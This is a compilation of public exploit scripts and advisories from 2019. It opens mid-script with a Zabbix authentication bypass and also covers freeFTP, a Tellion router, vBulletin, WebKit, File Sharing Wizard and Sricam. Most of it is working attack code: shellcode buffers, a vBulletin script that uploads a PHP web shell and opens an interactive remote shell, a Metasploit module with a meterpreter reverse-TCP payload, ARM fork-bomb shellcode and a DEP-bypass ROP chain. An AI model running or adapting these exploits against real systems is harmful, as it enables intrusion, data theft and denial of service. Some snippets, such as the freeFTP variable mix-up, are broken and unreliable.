use HTML::TreeBuilder;
my $host = shift || ''; # Full path url to the store
$host =~ s|/$||;
print "\033[2J";    #clear the screen
print "\033[0;0H"; #jump to 0,0
print "[ Zabbix <= 4.4  Authentication Bypass Demo PoC Exploit\n";
print "[ Exploit Author: Todor Donev 2019 <todor.donev\@gmail.com>\n";
print "[ e.g. perl $0 https://target:port/\n" and exit if ($host !~ m/^http/);
print "[ Initializing the browser\n";
my $user_agent = rand_ua("browsers");
my $browser  = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
   $browser->timeout(30);
   $browser->agent($user_agent);
my $target = $host."\x2f\x7a\x61\x62\x62\x69\x78\x2f\x7a\x61\x62\x62\x69\x78\x2e\x70\x68\x70\x3f\x61\x63\x74\x69\x6f\x6e\x3d\x64\x61\x73\x68\x62\x6f\x61\x72\x64\x2e\x76\x69\x65\x77\x26\x64\x61\x73\x68\x62\x6f\x61\x72\x64\x69\x64\x3d\x31";
my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);                      
my $response = $browser->request($request);
print "[ >>> $_ => ", $request->header($_), "\n" for  $request->header_field_names;
print "[ <<< $_ => ", $response->header($_), "\n" for  $response->header_field_names;
print "[ Exploit failed! 401 Unauthorized!\n" and exit if ($response->code eq '401');
print "[ Exploit failed! 403 Forbidden!\n" and exit if ($response->code eq '403');
if (defined ($response->as_string()) && ($response->as_string() =~ m/Dashboard/)){
    print "[\n[ The target is vulnerable. Try to open these links:\n";
    my $tree = HTML::TreeBuilder->new_from_content($response->as_string());
    my @files = $tree->look_down(_tag => 'a');
    for my $line (@files){
        next if ($line->attr('href') =~ m/javascript/);
        next if ($line->attr('href') =~ m/\#/);
        next if ($line->attr('href') =~ m/http/);
        print "[ ", $host."/zabbix/".$line->attr('href'), "\n";
    }
} else { 
        print "[ Exploit failed! The target isn't vulnerable\n";
        exit;
}

# Exploit Title: freeFTP 1.0.8 - Remote Buffer Overflow
# Date: 2019-09-01
# Author: Chet Manly
# Software Link: https://download.cnet.com/FreeFTP/3000-2160_4-10047242.html
# Version: 1.0.8
# CVE: N/A

from ftplib import FTP

buf =  ""
buf += "\x89\xe1\xdb\xdf\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x48\x68\x6d"
buf += "\x52\x57\x70\x75\x50\x63\x30\x51\x70\x6c\x49\x38\x65"
buf += "\x64\x71\x79\x50\x31\x74\x6e\x6b\x52\x70\x44\x70\x4e"
buf += "\x6b\x66\x32\x44\x4c\x6c\x4b\x30\x52\x57\x64\x4c\x4b"
buf += "\x43\x42\x64\x68\x36\x6f\x58\x37\x32\x6a\x55\x76\x36"
buf += "\x51\x79\x6f\x6c\x6c\x77\x4c\x61\x71\x43\x4c\x63\x32"
buf += "\x56\x4c\x47\x50\x6b\x71\x5a\x6f\x34\x4d\x45\x51\x6f"
buf += "\x37\x68\x62\x6a\x52\x76\x32\x70\x57\x4c\x4b\x73\x62"
buf += "\x44\x50\x4c\x4b\x72\x6a\x77\x4c\x6c\x4b\x72\x6c\x57"
buf += "\x61\x52\x58\x49\x73\x47\x38\x33\x31\x68\x51\x66\x31"
buf += "\x6c\x4b\x31\x49\x55\x70\x47\x71\x69\x43\x6c\x4b\x72"
buf += "\x69\x32\x38\x39\x73\x64\x7a\x63\x79\x4c\x4b\x37\x44"
buf += "\x6c\x4b\x66\x61\x4a\x76\x35\x61\x39\x6f\x6c\x6c\x6f"
buf += "\x31\x68\x4f\x54\x4d\x33\x31\x78\x47\x35\x68\x49\x70"
buf += "\x30\x75\x49\x66\x45\x53\x51\x6d\x49\x68\x37\x4b\x73"
buf += "\x4d\x61\x34\x71\x65\x6d\x34\x36\x38\x4c\x4b\x32\x78"
buf += "\x65\x74\x66\x61\x6a\x73\x65\x36\x4c\x4b\x74\x4c\x30"
buf += "\x4b\x4c\x4b\x51\x48\x57\x6c\x75\x51\x6a\x73\x6c\x4b"
buf += "\x53\x34\x6e\x6b\x43\x31\x4a\x70\x4d\x59\x53\x74\x66"
buf += "\x44\x55\x74\x53\x6b\x31\x4b\x63\x51\x36\x39\x62\x7a"
buf += "\x62\x71\x69\x6f\x6d\x30\x71\x4f\x51\x4f\x71\x4a\x4e"
buf += "\x6b\x62\x32\x6a\x4b\x6e\x6d\x53\x6d\x70\x6a\x47\x71"
buf += "\x4c\x4d\x4e\x65\x4c\x72\x53\x30\x65\x50\x47\x70\x66"
buf += "\x30\x30\x68\x65\x61\x4c\x4b\x32\x4f\x4c\x47\x6b\x4f"
buf += "\x69\x45\x4d\x6b\x6c\x30\x48\x35\x4e\x42\x71\x46\x52"
buf += "\x48\x59\x36\x4a\x35\x4d\x6d\x6d\x4d\x79\x6f\x38\x55"
buf += "\x47\x4c\x33\x36\x53\x4c\x56\x6a\x6f\x70\x49\x6b\x6b"
buf += "\x50\x73\x45\x37\x75\x6d\x6b\x31\x57\x46\x73\x63\x42"
buf += "\x72\x4f\x43\x5a\x45\x50\x56\x33\x4b\x4f\x48\x55\x55"
buf += "\x33\x35\x31\x32\x4c\x53\x53\x66\x4e\x55\x35\x72\x58"
buf += "\x45\x35\x53\x30\x41\x41"

buf = 'A' * 276
buf += '\x90' * 10
buf += shellcode
buf += 'B' * (486 - len(shellcode))
buf += '\x58' # pop eax
buf += '\xfe\xcc' # dec ah
buf += '\xfe\xcc' # dec ah
buf += '\xff\xe0' # jmp eax
buf += 'C' * 4
buf += '\xe8\xf0\xff\xff\xff' # call near
buf += 'D' * 9
buf += '\xeb\xf0\x90\x90' # jump backwards
buf += '\xc0\x3d\x42\x00' # 0x00423dc0 - pop, pop, ret
buf += 'E' * (1000 - len(buf))
ftp = FTP()
ftp.connect('192.168.1.1', 21)
ftp.login('anonymous', buf)

#!/usr/bin/perl -w
#
#  Tellion HN-2204AP Router Remote Configuration Disclosure Exploit
#
#  Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
#  Disclaimer:
#  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
#  caused by direct or indirect use of the  information or functionality provided by these programs. 
#  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
#  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
#  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!  
#  
#  (Dont do anything without permissions)
#
#  #  [test@localhost ~]$ perl tellion-HN-2204AP.pl http://192.168.1.100:8080/ | head
#  #  [ Tellion HN-2204AP Router Remote Configuration Disclosure Exploit
#  #  [ ================================================================
#  #  [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>
#  #  [ Initializing the browser
#  #  [ >>  Referer => http://192.168.1.100:8080
#  #  [ >>  User-Agent => Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.1.14) Gecko/20080821 Firefox/2.0.0.14
#  #  [ >>  Content-Type => application/x-www-form-urlencoded
#  #  [ <<  Connection => close
#  #  [ <<  Accept-Ranges => bytes
#  #  [ <<  Content-Length => 6796
#  #  [ <<  Content-Type => application/octet-stream
#  #  [ <<  Client-Date => Mon, 07 Oct 2019 10:14:31 GMT
#  #  [ <<  Client-Peer => 192.168.1.100:8080
#  #  [ <<  Client-Response-Num => 1
#  #  [ <<  Content-Disposition => attachment;filename="config.tgz"
#  #  [ <<  Content-Transfer-Encoding => binary
#  #  [ <<  Set-Cookie => QSESSIONID=2659efa77ba6d2fa85e28b1546455939; path=/
#  #  [
#  #  [ >> Configuration dump...
#  #  [
#  #  [ ./config/0000755000000000000000000000000013527155651011311 5ustar  rootwheel./config/sys_clipcomm.conf0000644000000000000000000000002713527155651014660 0ustar  rootwheelCLIPCOMM_ACTIVE=Enable
#  #  [ ./config/sys_alarm.conf0000640000000000000000000000015007033241647014136 0ustar  rootwheelP<SystemCPU OverloadZPSystemMemory Over Usage./config/net_wlan_common.conf0000644000000000000000000000057207033241630015327 0ustar  rootwheelCHANNEL_MODE=Auto
#  #  [ CHANNEL=2
#  #  [ CHANNEL_AUTO_01=On
#  #  [ CHANNEL_AUTO_02=Off
#  #  [ CHANNEL_AUTO_03=Off
#  #  [ CHANNEL_AUTO_04=Off
#  #  [ CHANNEL_AUTO_05=On
#  #  [ CHANNEL_AUTO_06=Off
#  #  [ CHANNEL_AUTO_07=Off
# 
use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use Gzip::Faster;
my $host = shift || ''; # Full path url to the store
$host =~ s|/$||;
print  "\033[2J";    #clear the screen
print  "\033[0;0H"; #jump to 0,0
print STDERR "[ Tellion HN-2204AP Router Remote Configuration Disclosure Exploit\n";
print STDERR "[ ================================================================\n";
print STDERR "[ Exploit Author: Todor Donev 2019 <todor.donev\@gmail.com>\n";
print STDERR "[ e.g. perl $0 https://target:port/\n" and exit if ($host !~ m/^http/);
print STDERR "[ Initializing the browser\n";
my $user_agent = rand_ua("browsers");
my $browser  = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
   $browser->timeout(30);
   $browser->agent($user_agent);
my $target = $host."\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x73\x79\x73\x74\x65\x6d\x5f\x63\x6f\x6e\x66\x69\x67\x5f\x66\x69\x6c\x65";
my $payload = "\x63\x6f\x6e\x66\x69\x67\x5f\x63\x6d\x64\x3d\x25\x43\x30\x25\x46\x41\x25\x43\x30\x25\x45\x35";
my $request = HTTP::Request->new (POST => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host], $payload);                      
my $response = $browser->request($request) or die "[ Exploit Failed: $!";
print STDERR "[ >>  $_ => ", $request->header($_), "\n" for  $request->header_field_names;
print STDERR "[ <<  $_ => ", $response->header($_), "\n" for  $response->header_field_names;
my $gzip = $response->content();
print STDERR "[\n[ >> Configuration dump...\n[\n";
print  "[ ", $_, "\n" for split(/\n/,gunzip($gzip));

----------------------------------------------------
vBulletin <= 5.5.4 Two SQL Injection Vulnerabilities
----------------------------------------------------


[-] Software Link:

https://www.vbulletin.com/


[-] Affected Versions:

Version 5.5.4 and prior versions.


[-] Vulnerabilities Description:

1) User input passed through keys of the "where" parameter to
the "ajax/api/hook/getHookList" endpoint is not properly validated
before being used in an SQL query. This can be exploited to e.g.
read sensitive data from the database through in-band SQL injection
attacks. Successful exploitation of this vulnerability requires an
user account with the "canadminproducts" or "canadminstyles" permission.

2) User input passed through keys of the "where" parameter to
the "ajax/api/widget/getWidgetList" endpoint is not properly validated
before being used in an SQL query. This can be exploited to e.g.
read sensitive data from the database through time-based SQL injection
attacks. Successful exploitation of this vulnerability requires an
user account with the "canusesitebuilder" permission.


[-] Solution:

Apply the vendor Security Patch Level 2 or upgrade to version 5.5.5 or 
later.


[-] Disclosure Timeline:

[30/09/2019] - Vendor notified
[03/10/2019] - Patch released: https://bit.ly/2OptAzI
[07/10/2019] - CVE number assigned
[07/10/2019] - Public disclosure


[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2019-17271 to these vulnerabilities.


[-] Credits:

Vulnerability discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2019-01

---------------------------------------------------------------------
vBulletin <= 5.5.4 (updateAvatar) Remote Code Execution Vulnerability
---------------------------------------------------------------------


[-] Software Link:

https://www.vbulletin.com/


[-] Affected Versions:

Version 5.5.4 and prior versions.


[-] Vulnerability Description:

User input passed through the "data[extension]" and "data[filedata]"
parameters
to the "ajax/api/user/updateAvatar" endpoint is not properly validated 
before
being used to update users' avatars. This can be exploited to inject and 
execute
arbitrary PHP code. Successful exploitation of this vulnerability 
requires
the "Save Avatars as Files" option to be enabled (disabled by default).


[-] Proof of Concept:

http://karmainsecurity.com/pocs/CVE-2019-17132

-----
\n"; print "\nExample....: php $argv[0] http://localhost/vb/ user passwd"; print "\nExample....: php $argv[0] https://vbulletin.com/ evil hacker\n\n"; die(); } list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]]; $ch = curl_init(); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HEADER, true); print "\n[-] Logging in with username '{$user}' and password '{$pass}'\n"; curl_setopt($ch, CURLOPT_URL, $url); if (!preg_match("/Cookie: .*sessionhash=[^;]+/", curl_exec($ch), $sid)) die("[-] Session ID not found!\n"); curl_setopt($ch, CURLOPT_URL, "{$url}?routestring=auth/login"); curl_setopt($ch, CURLOPT_HTTPHEADER, $sid); curl_setopt($ch, CURLOPT_POSTFIELDS, "username={$user}&password={$pass}"); if (!preg_match("/Cookie: .*sessionhash=[^;]+/", curl_exec($ch), $sid)) die("[-] Login failed!\n"); print "[-] Logged-in! Retrieving security token...\n"; curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, false); curl_setopt($ch, CURLOPT_HTTPHEADER, $sid); if (!preg_match('/token": "([^"]+)"/', curl_exec($ch), $token)) die("[-] Security token not found!\n"); print "[-] Uploading new avatar...\n"; $params = ["profilePhotoFile" => new CURLFile("avatar.jpeg"), "securitytoken" => $token[1]]; curl_setopt($ch, CURLOPT_URL, "{$url}?routestring=profile/upload-profilepicture"); curl_setopt($ch, CURLOPT_POSTFIELDS, $params); curl_setopt($ch, CURLOPT_HEADER, false); if (($path = (json_decode(curl_exec($ch)))->avatarpath) == null) die("[-] Upload failed!\n"); if (preg_match('/image\.php\?/', $path)) die("[-] Sorry, the 'Save Avatars as Files' option is disabled!\n"); print "[-] Updating avatar with PHP shell...\n"; $php_code = ''; $params = ["routestring" => "ajax/api/user/updateAvatar", "userid" => 0, "avatarid" => 0, "data[extension]" => "php", "data[filedata]" => $php_code, "securitytoken" => $token[1]]; curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params)); if (curl_exec($ch) !== "true") die("[-] Update failed!\n"); print "[-] Launching shell...\n"; preg_match('/(\d+)\.jpeg/', $path, $m); $path = preg_replace('/(\d+)\.jpeg/', ($m[1]+1).".php", $path); curl_setopt($ch, CURLOPT_URL, "{$url}core/{$path}"); curl_setopt($ch, CURLOPT_POST, false); while(1) { print "\nvb-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".base64_encode($cmd)]); preg_match('/____(.*)/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); } 
-----


[-] Solution:

Apply the vendor Security Patch Level 2 or upgrade to version 5.5.5 or 
later.


[-] Disclosure Timeline:

[30/09/2019] - Vendor notified
[03/10/2019] - Patch released: https://bit.ly/2OptAzI
[04/10/2019] - CVE number assigned
[07/10/2019] - Public disclosure


[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2019-17132 to this vulnerability.


[-] Credits:

Vulnerability discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2019-02

# Title:  Linux/ARM - Fork Bomb Shellcode (20 bytes)
# Date:   2019-10-07
# Category: Shellcode
# Tested: armv7l (32-bit)(Raspberry Pi 2 Model B) (OS: Raspbian Buster Lite)
# Author: CJHackerz
# Description: This shellcode creates new processes in infinite loop to exhaust CPU resources leading to crash

/*
## Compilation instruction

pi@raspberrypi:~ cat forkbomb_ARM32.s
.text
.global _start

_start:
.code 32
ADD R3, PC, #1//Switching to Thumb mode
BX R3

.code 16
_loop:
EOR R7, R7
MOV R7, #2//Syscall to fork()
SVC #1
MOV R8, R8 //NOP
BL _loop

pi@raspberrypi:~ cat Makefile
forkbomb_ARM32:  forkbomb_ARM32.o
ld forkbomb_ARM32.o -o forkbomb_ARM32
forkbomb_ARM32.o:  forkbomb_ARM32.s
as forkbomb_ARM32.s -o forkbomb_ARM32.o
clean:
rm *.o forkbomb_ARM32
pi@raspberrypi:~ make
pi@raspberrypi:~ objcopy -O binary forkbomb_ARM32 forkbomb_ARM32.bin
pi@raspberrypi:~ hexdump -v -e '"\\""x" 1/1 "%02x"""' forkbomb_ARM32.bin && echo
\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x7f\x40\x02\x27\x01\xdf\xc0\x46\xff\xf7\xfa\xff

## Testing compiled shellcode
pi@raspberrypi:~ file forkbomb_ARM32
forkbomb_ARM32: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, not stripped
pi@raspberrypi:~ strace ./forkbomb_ARM32
execve("./forkbomb_ARM32", ["./forkbomb_ARM32"], 0x7eab36e0 ) = 0
fork()                                  = 21975
fork()                                  = 22000
fork()                                  = 22016
fork()                                  = 22044
fork()                                  = 22087
fork()                                  = 22125
fork()                                  = 22162
fork()                                  = 22199
fork()                                  = 22242
fork()                                  = 22287
fork()                                  = 22326
fork()                                  = 23343
fork()                                  = 23501
fork()                                  = 23539
fork()                                  = 23606
fork()                                  = 26670
^Cstrace: Process 21974 detached

## Steps to compile given shellcode C program file
pi@raspberrypi:~ gcc -fno-stack-protector -z execstack forkbomb_ARM32.c -o forkbomb_ARM32-test

*/


#include<stdio.h>
#include<string.h>

unsigned char shellcode[] = "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x7f\x40\x02\x27\x01\xdf\xc0\x46\xff\xf7\xfa\xff";
main(){

printf("Shellcode Length:  %d\n", (int)strlen(shellcode));
int (*ret)() = (int(*)())shellcode;

ret();
}

Hello together, 

we’ve found the following vulnerability below. 

Affected software: RENPHO V3.0.0 (iOS App)
Vulnerability type: Missing Encryption and Integrity Check of Sensitive Data
Vulnerable version: Renpho Mobile Application V3.0.0 for iOS
Vulnerable component: Client app, transmitting data to server backend
Vendor report confidence: Unconfirmed
Fixed version: -
Vendor notification: 13/08/19
Solution date:
CVE reference: CVE-2019-14808
CVSSv3 Score: 6.8  AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N
Researcher Credits: Tim Schughart, Christian Horn
Communication Timeline: 
13th August 2019 Initial contact - no response
26th September second contact attempt - no response 
08th October fulldisclosure 

Vulnerability Details:
The client application (mobile app for iOS) transmits data unencrypted
to an server in JSON without integrity check, if an user changes
personal data in his profile tab oder logs hisself in his account.

Proof of concept:
Caputre traffice via proxy or MITM attack, while user logs in or changes his user profile. You are able to catch session id for cloning, password in cleartext oder change data on the fly, because of an missing integrity check. 


Best regards / Mit freundlichen Grüßen 

Dr. h.c. Tim Schughart 
CEO / Geschäftsführer  

--
ProSec GmbH
Robert-Koch-Straße 1-9
56751 Polch 

Website: https://www.prosec-networks.com 
E-Mail: info@prosec.networks.com 
Phone: +49 (0)261 450 930 90

Sitz der Gesellschaft / Company domiciled in: Polch
Registergericht / registry Court: Amtsgericht Koblenz, HRB 26457
Geschäftsführer: Tim Schughart
UST-IdNr./ VAT ID: DE321817516


"This E-Mail communication may contain CONFIDENTIAL, PRIVILEGED and/or LEGALLY PROTECTED information and is intended only for the named recipient(s). Any unauthorized use, dissemination, copying or forwarding is strictly prohibited. If you are not the intended recipient and have received this email communication in error, please notify the sender immediately, delete it and destroy all copies of this E-Mail.

"Diese E-Mail Mitteilung kann VERTRAULICHE, dem BERUFSGEHEIMNIS UNTERLIEGENDE und/oder RECHTLICH GESCHÜTZTE Informationen enthalten und ist ausschließlich für den/die genannten Adressaten bestimmt. Jede unbefugte Nutzung, Weitergabe, Vervielfältigung oder Versendung ist strengstens verboten. Sollten Sie nicht der angegebene Adressat sein und diese E-Mail Mitteilung irrtümlich erhalten haben, informieren Sie bitte sofort den Absender, löschen diese E-Mail und vernichten alle Kopien. 

# Exploit Title: OmniCenter 12.1.1 – Unauthenticated SQL Injection
# Exploit Author: Luis Rios 0x6c72696f73 [at] illumant.com
# Website: https://illumant.com
# Date: 2019-09-17
# Vendor: Netreo Inc (https://www.netreo.com/)
# Software Link: https://www.netreo.com/solutions/server-management/
# Affected Version: <= 12.1.1 & <= 12.0.7
# Patched Version: 12.1.2 & 12.0.8
# Category: Web Application
# Platform: Linux
# Tested on: Linux + MySQL
# CVE: CVE-2019-17128



# Description
########################

OmniCenter 12.1.1 and below (and 12.0.8 and below) is affected by an unauthenticated
SQL Injection (Boolean Based Blind). The injection allows an attacker to read
sensitive information from the database used by the application.



# Timeline
########################

09/17/2019 Discovery
09/18/2019 Contact with vender
10/01/2019 Patch Released (https://kb.netreo.com/oc12/omnicenter-12-1-2/)
10/02/2019 Request ID CVE
10/03/2019 Assigned CVE-2019-17128
10/04/2019 Vendor granted permission to publicly disclose
10/04/2019 Public disclosure



# About Illumant
########################

Illumant has conducted thousands of security assessment and compliance engagements,
helping over 800 clients protect themselves from cyber-attacks. Through meticulous
manual analysis, Illumant helps companies navigate the security and threat landscape
to become more secure, less of a target, and more compliant. For more information,
visit https://illumant.com/

[description]
Password disclosure in the web interface on socomec DIRIS A-40 devices before 48250501 allows a remote attacker to get full access to a device via the
/password.jsn URI.

------------------------------------------

[Vulnerability Type]
Incorrect Access Control

------------------------------------------

[Vendor of Product]
Socomec (https://www.socomec.com)

------------------------------------------

[Affected Product Code Base]
DIRIS A-40 https://www.socomec.com/single-circuit-multifunction-meters_en.html - all versions before ref 48250501

------------------------------------------

[Affected Component]
web interface

------------------------------------------

[Attack Type]
Remote

------------------------------------------

[Impact Denial of Service]
true

------------------------------------------

[Impact Information Disclosure]
true

------------------------------------------

[Attack Vectors]
An attacker visiting http://<device ip>/password.jsn can view the
devices usernames and passwords in cleartext and use these to get full
administrative control over the device.

------------------------------------------

[Has vendor confirmed or acknowledged the vulnerability?]
true

------------------------------------------

[Discoverer]
Jens Timmerman (Mazars)

------------------------------------------

[Reference]
https://www.socomec.com/single-circuit-multifunction-meters_en.html

CVE-2019-15859

WebKit: Same-Origin Policy bypass in FrameLoader::clear

VULNERABILITY DETAILS
```
void FrameLoader::clear(Document* newDocument, bool clearWindowProperties, bool clearScriptObjects, bool clearFrameView)
{
    m_frame.editor().clear();

    if (!m_needsClear)
        return; // ***1***
    m_needsClear = false;

    if (m_frame.document()->pageCacheState() != Document::InPageCache) {
        m_frame.document()->cancelParsing(); // ***2***
[...]
    if (clearWindowProperties)
        m_frame.windowProxy().setDOMWindow(newDocument->domWindow()); // ***3***
```

This bug is similar to https://bugs.chromium.org/p/project-zero/issues/detail?id=1162. In certain
circumstances, `Document::cancelParsing`[2], which is not guarded by `FrameNavigationDisabler`,
might fire the `readystatechanged` event handler. If the handler performs a synchronous document
load, the reentrant `clear` call for the new document will exit early[1] and won't update the
active global object of the page[3], so the new document will use the old (potentially
cross-origin) global object for JavaScript execution. An attacker can exploit it to partially leak
the content of the new document.


VERSION
WebKit revision 246877
Safari version 12.1.1 (14607.2.6.1.1)


REPRODUCTION CASE
```
<body>
<script>
function createURL(data, type = 'text/html') {
    return URL.createObjectURL(new Blob([data], {type: type}));
}

function waitForLoad() {
    showModalDialog(createURL(`
<script>
        let it = setInterval(() => {
            try {
                opener.victim_frame.contentDocument.x;
            } catch (e) {
                clearInterval(it);
                window.close();
            }
        }, 0);
</scrip` + 't>'));
}

window.onclick = () => {
    victim_frame = document.body.appendChild(document.createElement('iframe'));

    victim_frame.contentDocument.open();
    victim_frame.contentDocument.onreadystatechange = () => {
        victim_frame.contentDocument.onreadystatechange = null;

        victim_frame.contentDocument.open();
        audio = victim_frame.contentDocument.appendChild(document.createElement('audio'));
        counter = 0;
        victim_frame.contentDocument.onreadystatechange = () => {
            if (++counter != 2) {
                return;
            }

            victim_frame.contentWindow.func = function(value) {
                alert('leaked: ' + value);
            }

            let a = victim_frame.contentDocument.createElement('a');
            a.href = victim_url;
            a.click();

            waitForLoad();
        };
        audio.src = location + '?' + 'A'.repeat(10000) + Math.random();
        victim_frame.contentDocument.close();
        document.implementation.createHTMLDocument().adoptNode(audio);
    };

    victim_frame.src = 'javascript:\"\"';
}

victim_url = 'data:text/html,<body><script>func(\"secret value\")<\\/script></body>';

ext = document.body.appendChild(document.createElement('iframe'));
ext.src = victim_url;
</script>
</body>
```


CREDIT INFORMATION
Sergei Glazunov of Google Project Zero


This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made
broadly available (whichever is earlier), the bug report will become visible to the public.






Found by: glazunov@google.com

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Seh

  def initialize(info = {})
    super update_info(info,
'Name' => 'File Sharing Wizard - POST SEH Overflow',
'Description' => %q(
        This module exploits an unauthenticated HTTP POST SEH-based buffer overflow in File Sharing Wizard 1.5.0.
      ),
'Author' => [
'x00pwn', # Original exploit
'Dean Welch <dean_welch[at]rapid7.com>' # Module
                      ],
'License'        => MSF_LICENSE,
'References'     =>
                          [
                            %w[CVE 2019-16724],
                            %w[EDB 47412]
                          ],
'Payload' =>
                          {
'BadChars' => "\x00\x20"
                          },
'DisclosureDate' => '2019-09-24',
'DefaultOptions' =>
                          {
'RPORT' => 80,
'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
                          },
'Platform'       => 'win',
'Arch' => [ ARCH_X86 ],
'Targets' =>
                          [
                            ['Windows Vista / Windows 7 (x86)', { 'Offset' => 1040, 'Ret' => 0x7c38a67f }] # 0x7c38a67f : pop ecx # pop ecx # ret  |  {PAGE_EXECUTE_READ} [MSVCR71.dll]
                          ])
  end

  def check
    res = send_request_cgi
    if res.nil?
      fail_with(Failure::Unreachable, 'Connection timed out.')
    end
    # Checks for the `WWW-Authenticate` header in the response
    if res.code && res.code == 401 && res.headers['WWW-Authenticate'].include?('Basic realm="File Sharing Wizard"')
      CheckCode::Detected
    else
      CheckCode::Safe
    end
  end

  def exploit
    buf = rand_text_english(target['Offset'])
    buf << generate_seh_payload(target.ret)
    print_status('Sending payload to target')
    send_request_raw({ 'method' => 'POST', 'uri' => buf }, 0)
  end

end

# Exploit Title: Sricam DeviceViewer 3.12.0.1 - 'add user' Local Buffer Overflow (DEP Bypass)
# Date: 08/10/2019
# Exploit Author: Alessandro Magnosi
# Vendor Homepage: http://www.sricam.com/
# Software Link: http://download.sricam.com/Manual/DeviceViewer.exe
# Version: v3.12.0.1
# Exploit type: Local
# Tested on: Windows 7 SP1

# Steps to reproduce:
#   1. Get the WinExec address from arwin.exe kernel32.dll WinExec
#   2. Change the related address in the PoC
#   3. Generate the payload using the PoC
#   4. Log in the Sricam DeviceViewer application
#   5. Go to System Configuration -> User Management
#   6. Put the content of the generated file in User Info -> Username  
#   7. Click on Add
#   8. A command shell will appear

#!/usr/bin/python

from struct import pack, unpack

def create_rop_chain():

    rops = [

    0x6a1142aa,  # XOR EDX,EDX # RETN

    0x6a569810,  # POP EDX # RETN [avcodec-54.dll] 
    0x6ae9c126,  # &Writable location [avutil-50.dll] 

    0x6a5dac8a,  # POP EAX # RETN
    0xff9b929d,  # NEG "cmd\0"

    0x6a2420e8,  # NEG EAX # RETN [avcodec-54.dll]

    0x6994766b,  # PUSH EAX # MOV DWORD PTR DS:[EDX],EAX # ADD ESP,3C # POP EBX # POP ESI # POP EDI # POP EBP # RETN [avformat-54.dll]
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP

    0x6a18e062,  # ADD ESP, 10 # RETN ---> ESI
    0x6a2420ea,  # ROP NOP            ---> EDI     

    0x6a45e446,  # XCHG EAX,EDX # RETN  [avcodec-54.dll] 
    0x6a29d716,  # XCHG EAX,ECX # RETN  [avcodec-54.dll] 

    ##  ECX = ascii "cmd\0"

    0x6a569810,  # POP EDX # RETN [avcodec-54.dll] 
    0x6a36264a,  # CALL EBX

    ## EDX = CALL EBX

    0x6a5dac8a,  # POP EAX # RETN
    0x76e33231,  # ptr to WinExec() [kernel32.dll]  
    #### Unfortunately, this has to be hardcoded as no reliable pointer is available into the aplication  

    0x6a150411,  # XCHG EAX,EBX # RETN [avcodec-54.dll]

    ## EBX = &WinExec

    0x6a5dac8a,  # POP EAX # RETN
    0xffffffff,  # -0x00000001-> ebx
    0x6a2420e8,  # NEG EAX # RETN [avcodec-54.dll]

    ## EAX = 1

    0x6a5eb992,  # PUSHAD # RETN [avcodec-54.dll]
    0x6a2420ea,  # ROP NOP    
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    0x6a2420ea,  # ROP NOP
    ]
    return ''.join(pack('<I', _) for _ in rops)


def nops(length):
    return "\x90" * length

rop_chain = create_rop_chain()
maxlen = 5000

# Stack pivoting address
# 0x6a443e58 : {pivot 2252 / 0x8cc} :  # ADD ESP,8BC # POP EBX # POP ESI # POP EDI # POP EBP # RETN [avcodec-54.dll]
seh = pack("<I", 0x6a443e58)

# Don't care nseh
nseh = nops(4)

